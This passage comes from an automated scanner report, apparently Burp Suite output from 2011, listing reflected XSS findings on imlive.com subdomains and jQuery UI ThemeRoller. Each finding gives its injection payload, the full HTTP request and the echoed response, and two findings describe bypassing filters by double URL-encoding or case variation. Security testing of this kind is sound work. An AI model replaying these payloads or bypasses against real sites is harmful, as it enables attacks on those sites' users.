The value of the gotopage request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload efac5'onerror%3d'alert(1)'f4ba4def511 was submitted in the gotopage parameter. This input was echoed as efac5'onerror='alert(1)'f4ba4def511 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=efac5'onerror%3d'alert(1)'f4ba4def511 HTTP/1.1
Host: in.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:24:50 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ix=k; path=/
Set-Cookie: iin=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/
Set-Cookie: ASPSESSIONIDQQSSTATD=NKPDBJMAFMLOCIAIEHIHPIKM; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:24:51 GMT
Connection: close
Content-Length: 8306
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/

<HTML>
<HEAD>
<meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5">
<title>ImLive.com - Page Not Found</title>

<link rel="stylesheet" type="text/css" href="http
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=in.imlive.com&ul=/waccess/efac5'onerror='alert(1)'f4ba4def511/&lr=1107815903&ud=0&pe=404.asp&qs=404;http://in.imlive.com:80/waccess/efac5'onerror='alert(1)'f4ba4def511/&sr=0&id=0&iu=1' height='1' width='1'>
...[SNIP]...

4.578. http://it.imlive.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://it.imlive.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 46421'-alert(1)-'4594a948ef4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /?46421'-alert(1)-'4594a948ef4=1 HTTP/1.1
Host: it.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=idb51qqh31xv3x45cxo5dx45; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=idb51qqh31xv3x45cxo5dx45; path=/; HttpOnly
Set-Cookie: spvdr=vd=a5fa461c-09b7-4606-8bf0-57b4f45b4d27&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:24:51 GMT; path=/
Set-Cookie: iit=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:24:51 GMT
Connection: close
Content-Length: 18915
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="it-IT" lang="it-IT" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815996&ud=0&pe=/homepage.aspx&he=it.imlive.com&ul=/?46421'-alert(1)-'4594a948ef4=1&qs=46421'-alert(1)-'4594a948ef4=1&qs=46421'-alert(1)-'4594a948ef4=1&iy=dallas&id=44&iu=1&vd=a5fa461c-09b7-4606-8bf0-57b4f45b4d27';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attach
...[SNIP]...

4.579. http://it.imlive.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://it.imlive.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e1c9"><a>8cb16e9fe00 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /?9e1c9"><a>8cb16e9fe00=1 HTTP/1.1
Host: it.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=ccdifu55oarljg55lbciuw55; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=ccdifu55oarljg55lbciuw55; path=/; HttpOnly
Set-Cookie: spvdr=vd=c4be0621-1928-45cc-b3f3-18258a0d7a1f&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:24:50 GMT; path=/
Set-Cookie: iit=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:24:49 GMT
Connection: close
Content-Length: 18740
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="it-IT" lang="it-IT" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/uaccess/0/||9e1c9"><a>8cb16e9fe00~1');return false;">
...[SNIP]...

4.580. http://it.imlive.com/waccess/ [gotopage parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://it.imlive.com
Path:	/waccess/

Issue detail

The value of the gotopage request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a32d9'onerror%3d'alert(1)'7223884f696 was submitted in the gotopage parameter. This input was echoed as a32d9'onerror='alert(1)'7223884f696 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=a32d9'onerror%3d'alert(1)'7223884f696 HTTP/1.1
Host: it.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:25:04 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ix=k; path=/
Set-Cookie: iit=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/
Set-Cookie: ASPSESSIONIDQSQSRBSD=HDONOIMAGIIFDHIHJOLHJHAN; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:25:04 GMT
Connection: close
Content-Length: 8305
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/

<HTML>
<HEAD>
<meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5">
<title>ImLive.com - Page Not Found</title>

<link rel="stylesheet" type="text/css" href="http
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=it.imlive.com&ul=/waccess/a32d9'onerror='alert(1)'7223884f696/&lr=1107815903&ud=0&pe=404.asp&qs=404;http://it.imlive.com:80/waccess/a32d9'onerror='alert(1)'7223884f696/&sr=0&id=0&iu=1' height='1' width='1'>
...[SNIP]...

4.581. http://jp.imlive.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jp.imlive.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bda08"><ScRiPt>alert(1)</ScRiPt>8bd9e847e0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /?bda08"><ScRiPt>alert(1)</ScRiPt>8bd9e847e0=1 HTTP/1.1
Host: jp.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=dbqosr45r1ekob55zrcmo3vs; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=dbqosr45r1ekob55zrcmo3vs; path=/; HttpOnly
Set-Cookie: spvdr=vd=df13fca7-243b-46a1-b685-4ed2e476c681&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:03 GMT; path=/
Set-Cookie: ijp=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:25:02 GMT
Connection: close
Content-Length: 20266
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ja-JP" lang="ja-JP" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/uaccess/0/||bda08"><script>alert(1)</script>8bd9e847e0~1');return false;">
...[SNIP]...

4.582. http://jp.imlive.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jp.imlive.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d2e62'-alert(1)-'e87ff225301 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /?d2e62'-alert(1)-'e87ff225301=1 HTTP/1.1
Host: jp.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=htu2ck45js3iwfzirn2hch55; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=htu2ck45js3iwfzirn2hch55; path=/; HttpOnly
Set-Cookie: spvdr=vd=7a755e33-be6e-4c0d-be05-9c18484cccd6&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:04 GMT; path=/
Set-Cookie: ijp=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:25:03 GMT
Connection: close
Content-Length: 19890
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ja-JP" lang="ja-JP" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815903&ud=0&pe=/homepage.aspx&he=jp.imlive.com&ul=/?d2e62'-alert(1)-'e87ff225301=1&qs=d2e62'-alert(1)-'e87ff225301=1&qs=d2e62'-alert(1)-'e87ff225301=1&iy=dallas&id=44&iu=1&vd=7a755e33-be6e-4c0d-be05-9c18484cccd6';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attach
...[SNIP]...

4.583. http://jqueryui.com/themeroller/ [bgColorActive parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the bgColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f240"><script>alert(1)</script>f1fb6a82e6a was submitted in the bgColorActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff6f240"><script>alert(1)</script>f1fb6a82e6a&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 29 Jan 2011 05:04:12 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
lt=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff6f240"><script>alert(1)</script>f1fb6a82e6a&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&bord
...[SNIP]...

4.584. http://jqueryui.com/themeroller/ [bgColorContent parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the bgColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d42b3"><script>alert(1)</script>68731049f78 was submitted in the bgColorContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffffd42b3"><script>alert(1)</script>68731049f78&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 29 Jan 2011 05:00:58 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
l&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffffd42b3"><script>alert(1)</script>68731049f78&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&border
...[SNIP]...

4.585. http://jqueryui.com/themeroller/ [bgColorDefault parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the bgColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1bba"><script>alert(1)</script>d567ad6aac5 was submitted in the bgColorDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6c1bba"><script>alert(1)</script>d567ad6aac5&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 29 Jan 2011 05:02:02 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6c1bba"><script>alert(1)</script>d567ad6aac5&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColor
...[SNIP]...

4.586. http://jqueryui.com/themeroller/ [bgColorError parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the bgColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ff0c"><script>alert(1)</script>09e48b8ba84 was submitted in the bgColorError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec9ff0c"><script>alert(1)</script>09e48b8ba84&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 29 Jan 2011 05:05:30 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
2121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec9ff0c"><script>alert(1)</script>09e48b8ba84&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30
...[SNIP]...

4.587. http://jqueryui.com/themeroller/ [bgColorHeader parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the bgColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a89eb"><script>alert(1)</script>243270c1e17 was submitted in the bgColorHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccca89eb"><script>alert(1)</script>243270c1e17&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 29 Jan 2011 05:00:23 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

